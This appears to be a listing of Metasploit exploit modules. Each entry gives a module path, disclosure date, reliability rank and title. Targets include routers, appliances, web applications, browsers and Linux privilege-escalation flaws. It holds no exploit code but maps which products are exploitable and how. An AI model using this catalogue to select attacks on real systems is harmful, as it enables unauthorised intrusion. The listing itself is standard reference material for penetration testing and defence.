linux/http/dnalims_admin_exec 2017-03-08 excellent Yes dnaLIMS Admin Module Command Execution + linux/http/docker_daemon_tcp 2017-07-25 excellent Yes Docker Daemon - Unprotected TCP Socket Exploit + linux/http/dolibarr_cmd_exec 2012-04-06 excellent Yes Dolibarr ERP/CRM Post-Auth OS Command Injection + linux/http/dreambox_openpli_shell 2013-02-08 great No OpenPLI Webif Arbitrary Command Execution + linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection + linux/http/empire_skywalker 2016-10-15 excellent Yes PowerShellEmpire Arbitrary File Upload (Skywalker) + linux/http/esva_exec 2012-08-16 excellent Yes E-Mail Security Virtual Appliance learn-msg.cgi Command Injection + linux/http/f5_icall_cmd 2015-09-03 excellent Yes F5 iControl iCall::Script Root Command Execution + linux/http/f5_icontrol_exec 2013-09-17 excellent Yes F5 iControl Remote Root Command Execution + linux/http/foreman_openstack_satellite_code_exec 2013-06-06 excellent No Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection + linux/http/fritzbox_echo_exec 2014-02-11 excellent Yes Fritz!Box Webcm Unauthenticated Command Injection + linux/http/github_enterprise_secret 2017-03-15 excellent Yes Github Enterprise Default Session Secret And Deserialization Vulnerability + linux/http/gitlist_exec 2014-06-30 excellent Yes Gitlist Unauthenticated Remote Command Execution + linux/http/goahead_ldpreload 2017-12-18 excellent Yes GoAhead Web Server LD_PRELOAD Arbitrary Module Load + linux/http/goautodial_3_rce_command_injection 2015-04-21 excellent Yes GoAutoDial 3.3 Authentication Bypass / Command Injection + linux/http/gpsd_format_string 2005-05-25 average No Berlios GPSD Format String Vulnerability + linux/http/groundwork_monarch_cmd_exec 2013-03-08 excellent Yes GroundWork monarch_scan.cgi OS Command Injection + linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution + linux/http/hp_system_management 2012-09-01 normal Yes HP System Management Anonymous Access Code Execution + linux/http/hp_van_sdn_cmd_inject 2018-06-25 excellent Yes HP VAN SDN Controller Root Command Injection + linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection + linux/http/ibm_qradar_unauth_rce 2018-05-28 excellent Yes IBM QRadar SIEM Unauthenticated Remote Code Execution + linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection + linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock) + linux/http/ipfire_oinkcode_exec 2017-06-09 excellent Yes IPFire proxy.cgi RCE + linux/http/ipfire_proxy_exec 2016-05-04 excellent Yes IPFire proxy.cgi RCE + linux/http/kaltura_unserialize_cookie_rce 2017-09-12 excellent Yes Kaltura Remote PHP Code Execution over Cookie + linux/http/kaltura_unserialize_rce 2016-03-15 excellent Yes Kaltura Remote PHP Code Execution + linux/http/kloxo_sqli 2014-01-28 manual Yes Kloxo SQL Injection and Remote Code Execution + linux/http/lifesize_uvc_ping_rce 2014-03-21 excellent No LifeSize UVC Authenticated RCE via Ping + linux/http/linksys_apply_cgi 2005-09-13 great No Linksys WRT54 Access Point apply.cgi Buffer Overflow + linux/http/linksys_e1500_apply_exec 2013-02-05 excellent No Linksys E1500/E2500 apply.cgi Remote Command Injection + linux/http/linksys_themoon_exec 2014-02-13 excellent Yes Linksys E-Series TheMoon Remote Command Injection + linux/http/linksys_wrt110_cmd_exec 2013-07-12 excellent Yes Linksys Devices pingstr Remote Command Injection + linux/http/linksys_wrt160nv2_apply_exec 2013-02-11 excellent No Linksys WRT160nv2 apply.cgi Remote Command Injection + linux/http/linksys_wrt54gl_apply_exec 2013-01-18 manual No Linksys WRT54GL apply.cgi Command Execution + linux/http/linksys_wvbr0_user_agent_exec_noauth 2017-12-13 excellent Yes Linksys WVBR0-25 User-Agent Command Execution + linux/http/logsign_exec 2017-02-26 excellent Yes Logsign Remote Command Injection + linux/http/mailcleaner_exec 2018-12-19 excellent No Mailcleaner Remote Code Execution + linux/http/microfocus_secure_messaging_gateway 2018-06-19 excellent Yes MicroFocus Secure Messaging Gateway Remote Code Execution + linux/http/multi_ncc_ping_exec 2015-02-26 normal Yes D-Link/TRENDnet NCC Service Command Injection + linux/http/mutiny_frontend_upload 2013-05-15 excellent Yes Mutiny 5 Arbitrary File Upload + linux/http/mvpower_dvr_shell_exec 2015-08-23 excellent Yes MVPower DVR Shell Unauthenticated Command Execution + linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution + linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution + linux/http/netgear_dgn1000_setup_unauth_exec 2013-06-05 excellent Yes Netgear DGN1000 Setup.cgi Unauthenticated RCE + linux/http/netgear_dgn1000b_setup_exec 2013-02-06 excellent No Netgear DGN1000B setup.cgi Remote Command Execution + linux/http/netgear_dgn2200b_pppoe_exec 2013-02-15 manual No Netgear DGN2200B pppoe.cgi Remote Command Execution + linux/http/netgear_dnslookup_cmd_exec 2017-02-25 excellent Yes Netgear DGN2200 dnslookup.cgi Command Injection + linux/http/netgear_r7000_cgibin_exec 2016-12-06 excellent Yes Netgear R7000 and R6400 cgi-bin Command Injection + linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation + linux/http/netgear_unauth_exec 2016-02-25 excellent Yes Netgear Devices Unauthenticated Remote Command Execution + linux/http/netgear_wnr2000_rce 2016-12-20 excellent Yes NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow + linux/http/nginx_chunked_size 2013-05-07 great Yes Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow + linux/http/nuuo_nvrmini_auth_rce 2016-08-04 excellent No NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution + linux/http/nuuo_nvrmini_unauth_rce 2016-08-04 excellent Yes NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution + linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution + linux/http/openfiler_networkcard_exec 2012-09-04 excellent Yes Openfiler v2.x NetworkCard Command Execution + linux/http/pandora_fms_exec 2014-01-29 excellent Yes Pandora FMS Remote Code Execution + linux/http/pandora_fms_sqli 2014-02-01 excellent Yes Pandora FMS Default Credential / SQLi Remote Code Execution + linux/http/panos_readsessionvars 2017-12-11 excellent No Palo Alto Networks readSessionVarsFromFile() Session Corruption + linux/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow + linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution + linux/http/pineapp_ldapsyncnow_exec 2013-07-26 excellent Yes PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution + linux/http/pineapp_livelog_exec 2013-07-26 excellent Yes PineApp Mail-SeCure livelog.html Arbitrary Command Execution + linux/http/pineapp_test_li_conn_exec 2013-07-26 excellent Yes PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution + linux/http/pineapple_bypass_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection + linux/http/pineapple_preconfig_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection + linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution + linux/http/qnap_qcenter_change_passwd_exec 2018-07-11 excellent Yes QNAP Q'Center change_passwd Command Execution + linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution + linux/http/railo_cfml_rfi 2014-08-26 excellent Yes Railo Remote File Include + linux/http/rancher_server 2017-07-27 excellent Yes Rancher Server - Docker Exploit + linux/http/realtek_miniigd_upnp_exec_noauth 2015-04-24 normal Yes Realtek SDK Miniigd UPnP SOAP Command Execution + linux/http/riverbed_netprofiler_netexpress_exec 2016-06-27 excellent Yes Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution + linux/http/samsung_srv_1670d_upload_exec 2017-03-14 good Yes Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload + linux/http/seagate_nas_php_exec_noauth 2015-03-01 normal Yes Seagate Business NAS Unauthenticated Remote Command Execution + linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow + linux/http/sophos_wpa_iface_exec 2014-04-08 excellent No Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution + linux/http/sophos_wpa_sblistpack_exec 2013-09-06 excellent Yes Sophos Web Protection Appliance sblistpack Arbitrary Command Execution + linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution + linux/http/supervisor_xmlrpc_exec 2017-07-19 excellent Yes Supervisor XML-RPC Authenticated Remote Code Execution + linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution + linux/http/symantec_web_gateway_exec 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection + linux/http/symantec_web_gateway_file_upload 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability + linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability + linux/http/symantec_web_gateway_pbcontrol 2012-07-23 excellent Yes Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection + linux/http/symantec_web_gateway_restore 2014-12-16 excellent Yes Symantec Web Gateway 5 restore.php Post Authentication Command Injection + linux/http/synology_dsm_sliceupload_exec_noauth 2013-10-31 excellent Yes Synology DiskStation Manager SLICEUPLOAD Remote Command Execution + linux/http/tiki_calendar_exec 2016-06-06 excellent Yes Tiki-Wiki CMS Calendar Command Execution + linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection + linux/http/tr064_ntpserver_cmdinject 2016-11-07 normal Yes Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064 + linux/http/trend_micro_imsva_exec 2017-01-15 excellent No Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution + linux/http/trendmicro_imsva_widget_exec 2017-10-07 excellent Yes Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution + linux/http/trendmicro_sps_exec 2016-08-08 excellent Yes Trend Micro Smart Protection Server Exec Remote Code Injection + linux/http/trueonline_billion_5200w_rce 2016-12-26 excellent No TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection + linux/http/trueonline_p660hn_v1_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection + linux/http/trueonline_p660hn_v2_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection + linux/http/ueb_api_rce 2017-08-08 excellent Yes Unitrends UEB http api remote code execution + linux/http/vap2500_tools_command_exec 2014-11-25 normal Yes Arris VAP2500 tools_command.php Command Execution + linux/http/vcms_upload 2011-11-27 excellent Yes V-CMS PHP File Upload and Execute + linux/http/wanem_exec 2012-08-12 excellent Yes WAN Emulator v2.3 Command Execution + linux/http/wd_mycloud_multiupload_upload 2017-07-29 excellent Yes Western Digital MyCloud multi_uploadify File Upload Vulnerability + linux/http/webcalendar_settings_exec 2012-04-23 excellent Yes WebCalendar 1.2.4 Pre-Auth Remote Code Injection + linux/http/webid_converter 2011-07-05 excellent Yes WeBid converter.php Remote PHP Code Injection + linux/http/wipg1000_cmd_injection 2017-04-20 excellent Yes WePresent WiPG-1000 Command Injection + linux/http/xplico_exec 2017-10-29 excellent Yes Xplico Remote Code Execution + linux/http/zabbix_sqli 2013-09-23 excellent Yes Zabbix 2.0.8 SQL Injection and Remote Code Execution + linux/http/zen_load_balancer_exec 2012-09-14 excellent Yes ZEN Load Balancer Filelog Command Execution + linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution + linux/ids/alienvault_centerd_soap_exec 2014-05-05 excellent Yes AlienVault OSSIM av-centerd Command Injection + linux/ids/snortbopre 2005-10-18 good No Snort Back Orifice Pre-Preprocessor Buffer Overflow + linux/imap/imap_uw_lsub 2000-04-16 good Yes UoW IMAP Server LSUB Buffer Overflow + linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation + linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation + linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation + linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation + linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation + linux/local/autostart_persistence 2006-02-13 excellent No Autostart Desktop Item Persistence + linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation + linux/local/bpf_priv_esc 2016-05-04 good Yes Linux BPF doubleput UAF Privilege Escalation + linux/local/bpf_sign_extension_priv_esc 2017-11-12 great Yes Linux BPF Sign Extension Local Privilege Escalation + linux/local/cron_persistence 1979-07-01 excellent No Cron Persistence + linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation + linux/local/docker_daemon_privilege_escalation 2016-06-28 excellent Yes Docker Daemon Privilege Escalation + linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation + linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation + linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation + linux/local/hp_smhstart 2013-03-30 normal No HP System Management Homepage Local Privilege Escalation + linux/local/juju_run_agent_priv_esc 2017-04-13 excellent Yes Juju-run Agent Privilege Escalation + linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation + linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation + linux/local/libuser_roothelper_priv_esc 2015-07-24 great Yes Libuser roothelper Privilege Escalation + linux/local/nested_namespace_idmap_limit_priv_esc 2018-11-15 great Yes Linux Nested User Namespace idmap Limit Local Privilege Escalation + linux/local/netfilter_priv_esc_ipv4 2016-06-03 good Yes Linux Kernel 4.6.3 Netfilter Privilege Escalation + linux/local/network_manager_vpnc_username_priv_esc 2018-07-26 excellent Yes Network Manager VPNC Username Privilege Escalation + linux/local/ntfs3g_priv_esc 2017-01-05 good Yes Debian/Ubuntu ntfs-3g Local Privilege Escalation + linux/local/overlayfs_priv_esc 2015-06-16 good Yes Overlayfs Privilege Escalation + linux/local/pkexec 2011-04-01 great Yes Linux PolicyKit Race Condition Privilege Escalation + linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence + linux/local/rds_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) Privilege Escalation + linux/local/recvmmsg_priv_esc 2014-02-02 good Yes Linux Kernel recvmmsg Privilege Escalation + linux/local/service_persistence 1983-01-01 excellent No Service Persistence + linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation + linux/local/sophos_wpa_clear_keys 2013-09-06 excellent Yes Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation + linux/local/udev_netlink 2009-04-16 great No Linux udev Netlink Local Privilege Escalation + linux/local/ueb_bpserverd_privesc 2018-03-14 excellent No Unitrends Enterprise Backup bpserverd Privilege Escalation + linux/local/ufo_privilege_escalation 2017-08-10 good Yes Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation + linux/local/vmware_alsa_config 2017-05-22 excellent Yes VMware Workstation ALSA Config File Local Privilege Escalation + linux/local/vmware_mount 2013-08-22 excellent Yes VMWare Setuid vmware-mount Unsafe popen(3) + linux/local/zpanel_zsudo 2013-06-07 excellent Yes ZPanel zsudo Local Privilege Escalation Exploit + linux/misc/accellion_fta_mpipe2 2011-02-07 excellent No Accellion FTA MPIPE2 Command Execution + linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution + linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution + linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow + linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE + linux/misc/hikvision_rtsp_bof 2014-11-19 normal No Hikvision DVR RTSP Request Remote Code Execution + linux/misc/hp_data_protector_cmd_exec 2011-02-07 excellent No HP Data Protector 6 EXEC_CMD Remote Code Execution + linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution + linux/misc/hp_nnmi_pmd_bof 2014-09-09 normal Yes HP Network Node Manager I PMD Buffer Overflow + linux/misc/hp_vsa_login_bof 2013-06-28 normal Yes HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow + linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Execution + linux/misc/ib_inet_connect 2007-10-03 good No Borland InterBase INET_connect() Buffer Overflow + linux/misc/ib_jrd8_create_database 2007-10-03 good No Borland InterBase jrd8_create_database() Buffer Overflow + linux/misc/ib_open_marker_file 2007-10-03 good No Borland InterBase open_marker_file() Buffer Overflow + linux/misc/ib_pwd_db_aliased 2007-10-03 good No Borland InterBase PWD_db_aliased() Buffer Overflow + linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability + linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability + linux/misc/lprng_format_string 2000-09-25 normal No LPRng use_syslog Remote Format String Vulnerability + linux/misc/mongod_native_helper 2013-03-24 normal No MongoDB nativeHelper.apply Remote Code Execution + linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution + linux/misc/netcore_udp_53413_backdoor 2014-08-25 normal Yes Netcore Router Udp 53413 Backdoor + linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow + linux/misc/novell_edirectory_ncp_bof 2012-12-12 normal Yes Novell eDirectory 8 Buffer Overflow + linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution + linux/misc/qnap_transcode_server 2017-08-06 excellent Yes QNAP Transcode Server Command Execution + linux/misc/quest_pmmasterd_bof 2017-04-09 normal Yes Quest Privilege Manager pmmasterd Buffer Overflow + linux/misc/sercomm_exec 2013-12-31 great Yes SerComm Device Remote Code Execution + linux/misc/ueb9_bpserverd 2017-08-08 excellent Yes Unitrends UEB bpserverd authentication bypass RCE + linux/misc/zabbix_server_exec 2009-09-10 excellent Yes Zabbix Server Arbitrary Command Execution + linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow + linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow + linux/pop3/cyrus_pop3d_popsubfolders 2006-05-21 normal No Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow + linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution + linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow + linux/proxy/squid_ntlm_authenticate 2004-06-08 great No Squid NTLM Authenticate Overflow + linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) + linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load + linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow + linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow + linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) + linux/smtp/exim4_dovecot_exec 2013-05-03 excellent No Exim and Dovecot Insecure Configuration Command Injection + linux/smtp/exim_gethostbyname_bof 2015-01-27 great Yes Exim GHOST (glibc gethostbyname) Buffer Overflow + linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection + linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure + linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password + linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure + linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure + linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec + linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure + linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command + linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWind LEM Default SSH Password Remote Code Execution + linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability + linux/ssh/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload + linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key + linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable + linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow + linux/upnp/belkin_wemo_upnp_exec 2014-04-04 excellent Yes Belkin Wemo UPnP Remote Code Execution + linux/upnp/dlink_upnp_msearch_exec 2013-02-01 excellent Yes D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection + linux/upnp/miniupnpd_soap_bof 2013-03-27 normal Yes MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution + mainframe/ftp/ftp_jcl_creds 2013-05-12 normal Yes FTP JCL Execution + multi/browser/adobe_flash_hacking_team_uaf 2015-07-06 great No Adobe Flash Player ByteArray Use After Free + multi/browser/adobe_flash_nellymoser_bof 2015-06-23 great No Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow + multi/browser/adobe_flash_net_connection_confusion 2015-03-12 great No Adobe Flash Player NetConnection Type Confusion + multi/browser/adobe_flash_opaque_background_uaf 2015-07-06 great No Adobe Flash opaqueBackground Use After Free + multi/browser/adobe_flash_pixel_bender_bof 2014-04-28 great No Adobe Flash Player Shader Buffer Overflow + multi/browser/adobe_flash_shader_drawing_fill 2015-05-12 great No Adobe Flash Player Drawing Fill Shader Memory Corruption + multi/browser/adobe_flash_shader_job_overflow 2015-05-12 great No Adobe Flash Player ShaderJob Buffer Overflow + multi/browser/adobe_flash_uncompress_zlib_uaf 2014-04-28 great No Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free + multi/browser/firefox_escape_retval 2009-07-13 normal No Firefox 3.5 escape() Return Value Memory Corruption + multi/browser/firefox_pdfjs_privilege_escalation 2015-03-31 manual No Firefox PDF.js Privileged Javascript Injection + multi/browser/firefox_proto_crmfrequest 2013-08-06 excellent No Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution + multi/browser/firefox_proxy_prototype 2014-01-20 manual No Firefox Proxy Prototype Privileged Javascript Injection + multi/browser/firefox_queryinterface 2006-02-02 normal No Firefox location.QueryInterface() Code Execution + multi/browser/firefox_svg_plugin 2013-01-08 excellent No Firefox 17.0.1 Flash Privileged Code Injection + multi/browser/firefox_tostring_console_injection 2013-05-14 excellent No Firefox toString console.time Privileged Javascript Injection + multi/browser/firefox_webidl_injection 2014-03-17 excellent No Firefox WebIDL Privileged Javascript Injection + multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution + multi/browser/itms_overflow 2009-06-01 great No Apple OS X iTunes 8.1.1 ITMS Overflow + multi/browser/java_atomicreferencearray 2012-02-14 excellent No Java AtomicReferenceArray Type Violation Vulnerability + multi/browser/java_calendar_deserialize 2008-12-03 excellent No Sun Java Calendar Deserialization Privilege Escalation + multi/browser/java_getsoundbank_bof 2009-11-04 great No Sun Java JRE getSoundbank file:// URI Buffer Overflow + multi/browser/java_jre17_driver_manager 2013-01-10 excellent No Java Applet Driver Manager Privileged toString() Remote Code Execution + multi/browser/java_jre17_exec 2012-08-26 excellent No Java 7 Applet Remote Code Execution + multi/browser/java_jre17_glassfish_averagerangestatisticimpl 2012-10-16 excellent No Java Applet AverageRangeStatisticImpl Remote Code Execution + multi/browser/java_jre17_jaxws 2012-10-16 excellent No Java Applet JAX-WS Remote Code Execution + multi/browser/java_jre17_jmxbean 2013-01-10 excellent No Java Applet JMX Remote Code Execution + multi/browser/java_jre17_jmxbean_2 2013-01-19 excellent No Java Applet JMX Remote Code Execution + multi/browser/java_jre17_method_handle 2012-10-16 excellent No Java Applet Method Handle Remote Code Execution + multi/browser/java_jre17_provider_skeleton 2013-06-18 great No Java Applet ProviderSkeleton Insecure Invoke Method + multi/browser/java_jre17_reflection_types 2013-01-10 excellent No Java Applet Reflection Type Confusion Remote Code Execution + multi/browser/java_rhino 2011-10-18 excellent No Java Applet Rhino Script Engine Remote Code Execution + multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation + multi/browser/java_setdifficm_bof 2009-11-04 great No Sun Java JRE AWT setDiffICM Buffer Overflow + multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution + multi/browser/java_storeimagearray 2013-08-12 great No Java storeImageArray() Invalid Array Indexing Vulnerability + multi/browser/java_trusted_chain 2010-03-31 excellent No Java Statement.invoke() Trusted Method Chain Privilege Escalation + multi/browser/java_verifier_field_access 2012-06-06 excellent No Java Applet Field Bytecode Verifier Cache Remote Code Execution + multi/browser/mozilla_compareto 2005-07-13 normal No Mozilla Suite/Firefox compareTo() Code Execution + multi/browser/mozilla_navigatorjava 2006-07-25 normal No Mozilla Suite/Firefox Navigator Object Code Execution + multi/browser/msfd_rce_browser 2018-04-11 normal No Metasploit msfd Remote Code Execution via Browser + multi/browser/opera_configoverwrite 2007-03-05 excellent No Opera 9 Configuration Overwrite + multi/browser/opera_historysearch 2008-10-23 excellent No Opera historysearch XSS + multi/browser/qtjava_pointer 2007-04-23 excellent No Apple QTJava toQTPointer() Arbitrary Memory Access + multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution + multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass + multi/fileformat/adobe_u3d_meshcont 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + multi/fileformat/evince_cbt_cmd_injection 2017-07-13 excellent No Evince CBT File Command Injection + multi/fileformat/ghostscript_failed_restore 2018-08-21 excellent No Ghostscript Failed Restore Command Execution + multi/fileformat/js_unpacker_eval_injection 2015-02-18 excellent No Javascript Injection for Eval-based Unpackers + multi/fileformat/maple_maplet 2010-04-26 excellent No Maple Maplet File Creation and Command Execution + multi/fileformat/nodejs_js_yaml_load_code_exec 2013-06-28 excellent No Nodejs js-yaml load() Code Execution + multi/fileformat/office_word_macro 2012-01-10 excellent No Microsoft Office Word Malicious Macro Execution + multi/fileformat/peazip_command_injection 2009-06-05 excellent No PeaZip Zip Processing Command Injection + multi/fileformat/swagger_param_inject 2016-06-23 excellent No JSON Swagger CodeGen Parameter Injector + multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) + multi/ftp/wuftpd_site_exec_format 2000-06-22 great Yes WU-FTPD SITE EXEC/INDEX Format String Vulnerability + multi/gdb/gdb_server_exec 2014-08-24 great No GDB Server Remote Payload Execution + multi/hams/steamed 2018-04-01 manual No Steamed Hams + multi/handler manual No Generic Payload Handler + multi/http/activecollab_chat 2012-05-30 excellent Yes Active Collab "chat module" Remote PHP Code Injection Exploit + multi/http/ajaxplorer_checkinstall_exec 2010-04-04 excellent Yes AjaXplorer checkInstall.php Remote Command Execution + multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload + multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload + multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) + multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection + multi/http/apprain_upload_exec 2012-01-19 excellent Yes appRain CMF Arbitrary PHP File Upload Vulnerability + multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution + multi/http/auxilium_upload_exec 2012-09-14 excellent Yes Auxilium RateMyPet Arbitrary File Upload Vulnerability + multi/http/axis2_deployer 2010-12-30 excellent No Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) + multi/http/bassmaster_js_injection 2016-11-01 excellent Yes Bassmaster Batch 